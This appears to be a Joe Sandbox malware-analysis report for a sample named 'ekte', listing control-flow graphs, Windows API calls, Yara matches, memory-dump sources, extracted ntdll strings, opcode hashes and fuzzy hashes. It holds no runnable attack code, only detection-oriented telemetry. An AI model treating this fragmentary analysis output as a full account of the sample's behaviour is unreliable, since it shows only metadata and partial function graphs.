                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(6z95F416,00000111,00000000,00000000), ref: 00413EBA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 6z95F416$6z95F416$U
                                                                                                    • API String ID: 1836367815-1488886442

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 14 413cd5-413d02 15 413d03-413d08 14->15 16 413d09-413d0b 15->16 16->15 17 413d0d-413d10 16->17 17->16 18 413d12-413d1a 17->18 19 413d1c 18->19 20 413d3f-413d95 18->20 19->20 22 413d97-413d9d 20->22 23 413ded-413e29 20->23 25 413dbb-413dbd 22->25 24 413e2a-413e2b 23->24 26 413e47-413ead call 42e5e3 call 42eff3 call 4175f3 call 4046f3 call 424d13 24->26 27 413e2d-413e2e 24->27 25->24 28 413dbf-413dce 25->28 40 413ecd-413ed3 26->40 41 413eaf-413ebe PostThreadMessageW 26->41 27->25 29 413e30-413e3a 27->29 41->40 42 413ec0-413eca 41->42 42->40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6z95F416$6z95F416
                                                                                                    • API String ID: 0-1711006443

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 43 413e43-413e55 44 413e5d-413ead call 42eff3 call 4175f3 call 4046f3 call 424d13 43->44 45 413e58 call 42e5e3 43->45 54 413ecd-413ed3 44->54 55 413eaf-413ebe PostThreadMessageW 44->55 45->44 55->54 56 413ec0-413eca 55->56 56->54
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(6z95F416,00000111,00000000,00000000), ref: 00413EBA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 6z95F416$6z95F416
                                                                                                    • API String ID: 1836367815-1711006443

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 57 42c7f3-42c837 call 404783 call 42d6c3 RtlFreeHeap
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C832
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID: AcA
                                                                                                    • API String ID: 3298025750-3239212935

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 229 42c7a3-42c7e4 call 404783 call 42d6c3 RtlAllocateHeap
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,0041E434,?,?,00000000,?,0041E434,?,?,?), ref: 0042C7DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 239 42c843-42c87f call 404783 call 42d6c3 ExitProcess
                                                                                                    APIs
                                                                                                    • ExitProcess.KERNELBASE(?,00000000,00000000,?,D2355E8B,?,?,D2355E8B), ref: 0042C87A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: [Pj
                                                                                                    • API String ID: 0-2289356113
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                    • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                    • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                    • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                    • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                    • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                    • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                    • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                    • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                    • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                    • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                    • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                    • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                    • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                    • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                    • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • WindowsExcludedProcs, xrefs: 009D87C1
                                                                                                    • Kernel-MUI-Number-Allowed, xrefs: 009D87E6
                                                                                                    • Kernel-MUI-Language-Allowed, xrefs: 009D8827
                                                                                                    • Kernel-MUI-Language-SKU, xrefs: 009D89FC
                                                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 009D8914
                                                                                                    Similarity
                                                                                                    • API ID: _wcspbrk
                                                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                    • API String ID: 402402107-258546922
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: _wcsnlen
                                                                                                    • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                                                                    • API String ID: 3628947076-1387797911
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 9d5ce98cec4412846f1ae61997720b108428b158487b3d0b9774a79eba29256d
                                                                                                    • Instruction ID: d93b18219272e5173e50cebf286d090a232cd2b4fc2ec69c5ac9adf780fee3b9
                                                                                                    • Opcode Fuzzy Hash: 9d5ce98cec4412846f1ae61997720b108428b158487b3d0b9774a79eba29256d
                                                                                                    • Instruction Fuzzy Hash: 5F613871900659EACF34CF9AC8908BEBBB9EFD4310714C42DFAD647540D374AA40CBA0
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ___swprintf_l
                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                    • API String ID: 48624451-2108815105
                                                                                                    • Opcode ID: 010659198b78633bf2220596e87811a9526acb31737b4b1cc21367f5a97fdc83
                                                                                                    • Instruction ID: 70506e7f0936878756de04b9794823c36602662bd4048b62fe3fc0be40af4d43
                                                                                                    • Opcode Fuzzy Hash: 010659198b78633bf2220596e87811a9526acb31737b4b1cc21367f5a97fdc83
                                                                                                    • Instruction Fuzzy Hash: EC6190B3900648AACF20DF99C9404BE7BF5FF94392B14C569FCA9A7141E234EB489B50
                                                                                                    APIs
                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00A03F12
                                                                                                    Strings
                                                                                                    • Execute=1, xrefs: 00A03F5E
                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00A03EC4
                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00A03F4A
                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00A0E2FB
                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 00A0E345
                                                                                                    • ExecuteOptions, xrefs: 00A03F04
                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00A03F75
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                    • API String ID: 3901378454-484625025
                                                                                                    • Opcode ID: 025867061667c861f57006cf128499bdf2f002c89be552d3c4b976e8586bfa3d
                                                                                                    • Instruction ID: 52655d215fa7f5c7d3201bf60dff6823e5e030b42eb2eab9ed7f2c10d6d0af18
                                                                                                    • Opcode Fuzzy Hash: 025867061667c861f57006cf128499bdf2f002c89be552d3c4b976e8586bfa3d
                                                                                                    • Instruction Fuzzy Hash: 1141C672A4021D7ADF21DB95DDC6FEAB3BCAB54704F0009A9B105A60C2EA70AE458F61
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __fassign
                                                                                                    • String ID: .$:$:
                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                    • Instruction ID: 40fa7480716fe85591515bc5ef326a0c98e6045a083758abaa286ae9a4a87c2a
                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                    • Instruction Fuzzy Hash: 51A19B71D0430EEBCF24CF64C8457BEB7BCAF95305F24856ADA86A7283D6349A81CB51
                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A12206
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
